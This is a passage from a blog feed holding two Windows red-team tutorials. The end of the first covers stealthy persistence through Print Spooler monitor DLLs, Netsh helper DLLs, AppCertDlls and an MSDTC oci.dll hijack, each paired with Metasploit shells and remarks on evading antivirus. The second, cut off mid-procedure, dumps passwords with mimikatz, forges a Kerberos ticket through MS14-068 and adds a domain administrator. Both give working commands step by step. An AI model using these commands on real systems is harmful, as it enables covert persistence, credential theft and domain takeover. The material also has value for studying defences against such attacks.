href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F15oryg198w9egqse1sx2.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F15oryg198w9egqse1sx2.png" alt=" " width="800" height="823"></a></p> <p>This method bypasses all current startup inspection tools; the only means of detection is through the <code>bitsadmin</code> command:</p> <p><code>bitsadmin /list /allusers /verbose</code></p> <p>All tasks are displayed as shown (screenshot from a different test machine, hence data differs):</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F56bixo0pqnt5a1riitvy.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F56bixo0pqnt5a1riitvy.png" alt=" " width="645" height="591"></a></p> <h2> 0x07 Print Spooler Service </h2> <p><strong>Required Privileges:</strong> Administrator privileges without UAC reduction.<br><br> The Print Spooler service manages print jobs in the Windows operating system. Because many users still rely on printers, optimisation software does not recommend disabling this service. The Print Spooler API includes a function, <code>AddMonitor</code>, which installs a local port monitor and links configuration, data, and monitor files. This function injects a DLL into the <code>spoolsv.exe</code> process to implement the desired functionality. The DLLs required by the system in its default state are as follows:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flcy1uun0t16z81wco9zg.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flcy1uun0t16z81wco9zg.png" alt=" " width="632" height="56"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtuk93bthr2f7yxmeyal.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtuk93bthr2f7yxmeyal.png" alt=" " width="666" height="62"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F676t9urxao7r6scu4jyf.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F676t9urxao7r6scu4jyf.png" alt=" " width="654" height="58"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkho0j1cqsppj2426twu8.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkho0j1cqsppj2426twu8.png" alt=" " width="676" height="52"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa4qnr1b8cvqu5cwosvej.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa4qnr1b8cvqu5cwosvej.png" alt=" " width="666" height="70"></a></p> <p>These DLLs contain print‑driver‑related content. We can exploit this mechanism to plant a malicious DLL. Of course, as with service registration, this requires full administrator privileges.<br><br> First, place the malicious DLL in <code>C:\Windows\System32\</code>:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5hcvqsbrjy2ryfif3d84.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5hcvqsbrjy2ryfif3d84.png" alt=" " width="800" height="377"></a></p> <p>Then execute the command to add the relevant registry entry and the Driver key:</p> <p><code>reg add "hklm\system\currentcontrolset\control\print\monitors\monitor" /v "Driver" /d "monitor.dll" /t REG_SZ</code></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0qvtaqxqfp1i115gwh56.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0qvtaqxqfp1i115gwh56.png" alt=" " width="800" height="290"></a></p> <p>After reboot, the malicious DLL is automatically loaded into <code>spoolsv.exe</code>, offering high stealth:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp37l5a4889qg3bh7h6ec.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp37l5a4889qg3bh7h6ec.png" alt=" " width="800" height="676"></a></p> <p>The C2 session is established with SYSTEM privileges (MSF is used here for demonstration; a CS DLL would need to be rewritten):</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnt7pjdge94knb5fk41ma.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnt7pjdge94knb5fk41ma.png" alt=" " width="800" height="234"></a></p> <h2> 0x08 Netsh </h2> <p><strong>Required Privileges:</strong> Administrator privileges without UAC reduction.<br><br> Netsh is a native Windows command‑line tool for network configuration. It can import helper DLLs to extend functionality, and once imported, the DLL path is stored in the registry for permanent effect:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7z75qxexmvs0x3s358rk.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7z75qxexmvs0x3s358rk.png" alt=" " width="799" height="350"></a></p> <p>Thus, persistence can be achieved by importing a helper DLL. The command format is:</p> <p><code>netsh add helper [Absolute evil DLL path]</code></p> <p>However, because netsh does not start automatically, an auto‑start entry must be added as well:</p> <p><code>reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "cmd /c C:\Windows\System32\netsh"</code></p> <p>After reboot, the shell is still obtained:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7qx5cilt2g8doe01loxn.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7qx5cilt2g8doe01loxn.png" alt=" " width="798" height="228"></a></p> <p>The process tree and loaded malicious module are shown below; stealth is relatively high:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9bq01393fi3cyb71suo3.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9bq01393fi3cyb71suo3.png" alt=" " width="800" height="267"></a></p> <p>Because the testing still relied on an MSF‑generated DLL, launching netsh pops up a console window and blocks; terminating the netsh process drops the connection. Therefore, for practical red‑team use, a custom DLL must be developed.</p> <h2> 0x09 AppCertDlls </h2> <p><strong>Required Privileges:</strong> Administrator privileges without UAC reduction.<br><br> It is well known that the <code>AppInit_DLLs</code> registry value is read when <code>user32.dll</code> is loaded into memory; if a value exists, <code>LoadLibrary()</code> is called to load the user‑mode DLL. In earlier years, this method was quite popular for DLL‑injection persistence, but it has become ineffective on many modern systems. The reason is a flag check in <code>kernel32.dll</code> during startup, as illustrated:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdtt54ow4yl28fpao9b9h.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdtt54ow4yl28fpao9b9h.png" alt=" " width="660" height="196"></a></p> <p><code>kernel32.dll</code> queries class <code>0x67</code> via <code>NtQuerySystemInformation</code> and then checks whether the <code>ReturnLength</code> is equal to 2 (bitwise AND operation). If equal, it skips loading the DLL and returns.<br><br> Information regarding <code>0x67</code> can be found online:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1x904lep5rtgkb9mv1sp.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1x904lep5rtgkb9mv1sp.png" alt=" " width="800" height="301"></a></p> <p>This flag is toggled by <code>bcdedit.exe /set testsigning on/off</code>. However, most recent machines have Secure Boot enabled in the BIOS by default; unless this option is disabled, the flag cannot be modified. Consequently, this method currently faces considerable limitations.<br><br> Nevertheless, there exists another, less commonly used registry key that also permits automatic DLL loading: <code>AppCertDlls</code>. When a process invokes APIs such as <code>CreateProcess</code>, <code>CreateProcessAsUser</code>, <code>CreateProcessWithLoginW</code>, <code>CreateProcessWithTokenW</code>, or <code>WinExec</code>, the DLLs listed in this key are automatically loaded. Fortunately, many programmes call these APIs.<br><br> A test programme calling one of these APIs:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8iozg4eqdaobcovqixr.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw8iozg4eqdaobcovqixr.png" alt=" " width="779" height="680"></a></p> <p>Execution:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff52gm9bo8w2rwhiqfy69.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff52gm9bo8w2rwhiqfy69.png" alt=" " width="519" height="241"></a></p> <p>MSF session established:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvu6t3wtj9ba8eiyvd27z.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvu6t3wtj9ba8eiyvd27z.png" alt=" " width="800" height="115"></a></p> <p>Inspecting the process tree:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9usy1xtesmz3qhoo4oa5.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9usy1xtesmz3qhoo4oa5.png" alt=" " width="799" height="267"></a></p> <p>It merely spawns a <code>rundll32.exe</code> under a legitimate process, loading the malicious DLL. Stealth is high.<br><br> However, the MSF DLL remains usable only for testing. Because many system programmes call these APIs (e.g. <code>explorer.exe</code>), and the MSF DLL blocks the process, it can prevent the desktop from loading at startup. Therefore, a custom DLL must be developed for operational use.</p> <h2> 0x0A MSDTC </h2> <p><strong>Required Privileges:</strong> Administrator privileges without UAC reduction.<br><br> <code>msdtc.exe</code> is the Microsoft Distributed Transaction Coordinator. This process is invoked by Microsoft Personal Web Server and Microsoft SQL Server, and it manages multiple servers.<br><br> Upon startup, the service attempts to load three DLL files from <code>System32</code>: <code>oci.dll</code>, <code>SQLLib80.dll</code>, and <code>xa80.dll</code>. The service entry is shown below:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkjim1hkwn9un4rwd6fl7.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkjim1hkwn9un4rwd6fl7.png" alt=" " width="800" height="267"></a></p> <p>The corresponding registry entries:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffzmfiz64ybhsyk37b9sw.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffzmfiz64ybhsyk37b9sw.png" alt=" " width="800" height="348"></a></p> <p>In a default Windows installation, the file <code>oci.dll</code> is missing from the <code>System32</code> folder. Provided write access exists, a malicious DLL with that name can be placed there, and malicious code will execute when the service starts.<br><br> By default, the startup type is set to "Manual". Configure automatic startup with:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="nb">sc</span> <span class="kd">qc</span> <span class="kd">msdtc</span> <span class="nb">sc</span> <span class="kd">config</span> <span class="kd">msdtc</span> <span class="nb">start</span><span class="o">=</span> <span class="kd">auto</span> </code></pre> </div> <p>The malicious DLL will be loaded into the <code>msdtc.exe</code> process, yielding high stealth:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F37csufc6hx3qth3fqzv2.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F37csufc6hx3qth3fqzv2.png" alt=" " width="800" height="588"></a></p> <h2> 0x0B Conclusion </h2> <p>Initially, approximately twenty persistence techniques were catalogued, but in practice many are not universally applicable—some are limited to specific scenarios, particular configurations, or certain applications. Others are "passive" persistence methods, such as shortcut replacement; aside from exploiting a shortcut vulnerability, they will not trigger unless the target clicks them. Therefore, those with significant limitations were removed to streamline the article (and reduce workload), resulting in the ten techniques presented above, which are relatively generic.<br><br> During the collation process, a frustration at the Ring3 level became evident: user‑mode persistence that aims for high stealth and evasion of behavioural detection by anti‑virus must rely on native Windows functionality (living off the land). If these features or modules are disabled, uninstalled, or fail to start normally in special environments, the approach becomes problematic. Thus, preparing multiple methods is always beneficial.<br><br> Due to time constraints, some DLLs required for demonstration were directly generated by MSF, but their evasion capabilities are unsatisfactory. When developing the CS plugin later, these DLLs must be completed and subjected to further anti‑virus treatment.</p> windows persistence cybersecurity techniques Ticket Passing Attacks Excalibra Wed, 10 Jun 2026 03:06:18 +0000 https://dev.to/excalibra/ticket-passing-attacks-f77 https://dev.to/excalibra/ticket-passing-attacks-f77 <p>This section introduces two common attack methods within a domain: the Golden Ticket and the Silver Ticket.</p> <p>Furthermore, readers familiar with the Kerberos authentication process will find the principles of these two attacks considerably easier to comprehend. For those who have not previously studied Kerberos authentication, it is recommended to familiarize on the Kerberos Authentication Process.</p> <p><strong>Related Tools</strong></p> <ul> <li><a href="https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068" rel="noopener noreferrer">Ms14‑068</a></li> <li><a href="https://github.com/crupper/Forensics-Tool-Wiki/blob/master/windowsTools/PsExec64.exe" rel="noopener noreferrer">PSexec</a></li> <li><a href="https://github.com/gentilkiwi/mimikatz/" rel="noopener noreferrer">mimikatz</a></li> </ul> <h2> Golden Ticket </h2> <h3> Principle </h3> <p>During Kerberos authentication, after the Client authenticates with the Authentication Service (AS), the AS issues a Logon Session Key and a Ticket‑Granting Ticket (TGT) to the Client. The Logon Session Key is not retained within the Key Distribution Centre (KDC), whereas the NTLM hash of the <code>krbtgt</code> account is fixed. Consequently, if an attacker obtains the NTLM hash of <code>krbtgt</code>, it becomes possible to forge both a TGT and the corresponding Logon Session Key, thereby enabling the Client to proceed to the interaction with the Ticket‑Granting Service (TGS). Possession of a Golden Ticket permits the bypass of AS validation entirely; neither account name nor password is verified, and the attacker remains unaffected even if the domain administrator password is subsequently changed.</p> <h3> Characteristics </h3> <ul> <li>Does not require any interaction with the AS.</li> <li>Requires the NTLM hash of the <code>krbtgt</code> user.</li> </ul> <h3> Detailed Procedure </h3> <h4> 1. Forging Credentials to Escalate Privileges of a Domain User </h4> <p>Assume that an attacker has logged on to a host within the domain as a local <code>Administrator</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi4t6flxk0seonteslcxf.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi4t6flxk0seonteslcxf.png" alt=" " width="235" height="35"></a></p> <p>The command <code>net config workstation</code> reveals, among other details, that the domain is named <code>cyberpeace</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fphks358rtygyzxvchjkc.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fphks358rtygyzxvchjkc.png" alt=" " width="599" height="232"></a></p> <p>The command <code>nltest /dsgetdc:domain</code> identifies the Domain Controller hostname as <code>scene</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvcq9w2rgf622sm7f6m09.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvcq9w2rgf622sm7f6m09.png" alt=" " width="423" height="145"></a></p> <p>Mimikatz is uploaded and executed with administrator privileges:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="kd">mimikatz</span><span class="err">.exe</span> <span class="s2">"privilege::debug"</span> <span class="s2">"sekurlsa::logonpasswords"</span> <span class="s2">"exit"</span><span class="o">&gt;</span><span class="kd">log</span>.txt </code></pre> </div> <p>Examination of the generated <code>log.txt</code> reveals a domain user account, <code>devuser</code>, with the password <code>HOTdev123456</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fomah489t994ykpt7t680.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fomah489t994ykpt7t680.png" alt=" " width="246" height="72"></a></p> <p>Logging in as <code>devuser</code> and running <code>whoami</code> confirms the current user context.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fog0797dfke41zkikgl48.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fog0797dfke41zkikgl48.png" alt=" " width="150" height="21"></a></p> <p>The presence of the MS14‑068 vulnerability (CVE‑2014‑6324, addressed by patch 3011780) is checked with the command <code>systeminfo | find "3011780"</code>. An empty result indicates the patch is absent and the system is vulnerable. It should be noted that privilege escalation using this vulnerability is time‑limited.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdgcdepslpnsdush2r4n4.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdgcdepslpnsdush2r4n4.png" alt=" " width="461" height="64"></a></p> <p>An attempt to access the administrative share on the domain controller with <code>dir \\scene.cyberpeace.com\c$</code> fails owing to insufficient permissions.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp4ipntgpaad5a3zbvz4u.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp4ipntgpaad5a3zbvz4u.png" alt=" " width="535" height="46"></a></p> <p>The MS14‑068 exploit tool and mimikatz are uploaded. The user’s SID is obtained using either <code>whoami /user</code> or <code>whoami /all</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmtco6b9r8ea5q33nguft.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmtco6b9r8ea5q33nguft.png" alt=" " width="799" height="249"></a></p> <p>The MS14‑068 tool is used to forge a ticket:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="kd">C</span>:\MS14<span class="o">-</span><span class="m">068</span><span class="o">&gt;</span><span class="kd">MS14</span><span class="o">-</span><span class="m">068</span>.exe <span class="na">-u </span><span class="kd">devuser</span>@cyberpeace.com <span class="na">-p </span><span class="kd">HOTdev123456</span> <span class="na">-s </span><span class="kd">S</span><span class="o">-</span><span class="m">1</span><span class="o">-</span><span class="m">5</span><span class="o">-</span><span class="m">21</span><span class="o">-</span><span class="m">97341123</span><span class="o">-</span><span class="m">1865264218</span><span class="o">-</span><span class="m">933115267</span><span class="o">-</span><span class="m">1108</span> <span class="na">-d </span><span class="kd">scene</span>.cyberpeace.com </code></pre> </div> <p>A TGT ticket file is generated in the current directory. The general usage is:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ms14-068.exe <span class="nt">-u</span> &lt;domain_user&gt;@&lt;domain&gt; <span class="nt">-p</span> &lt;password&gt; <span class="nt">-s</span> &lt;user_SID&gt; <span class="nt">-d</span> &lt;domain_controller&gt; </code></pre> </div> <p>Within mimikatz, the existing Kerberos ticket cache is purged and the forged ticket is imported:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">mimikatz</span><span class="w"> </span><span class="c"># kerberos::purge</span><span class="w"> </span><span class="n">mimikatz</span><span class="w"> </span><span class="c"># kerberos::ptc &lt;path_to_ticket_file&gt;</span><span class="w"> </span></code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmkloxfa1l96j1e4y3bct.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmkloxfa1l96j1e4y3bct.png" alt=" " width="644" height="260"></a></p> <p>The command <code>dir \\scene.cyberpeace.com\c$</code> now executes successfully, demonstrating that domain administrator privileges have been obtained.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmjkbrf5mn6wabc2xvexb.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmjkbrf5mn6wabc2xvexb.png" alt=" " width="530" height="194"></a></p> <p>A new domain administrator account, <code>aaa</code>, is created:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>net user aaa Qwe123... /add /domain net group <span class="s2">"Domain Admins"</span> aaa /add /domain </code></pre> </div> <h4> 2. Forging a Golden Ticket </h4> <p><strong>Prerequisites for forging a Golden Ticket</strong></p> <ol> <li>Domain name</li> <li>Domain SID value</li> <li>NTLM hash of the <code>krbtgt</code> account</li> <li>Arbitrary username to be forged</li> </ol> <p>Logging in as the domain administrator <code>aaa</code> and executing 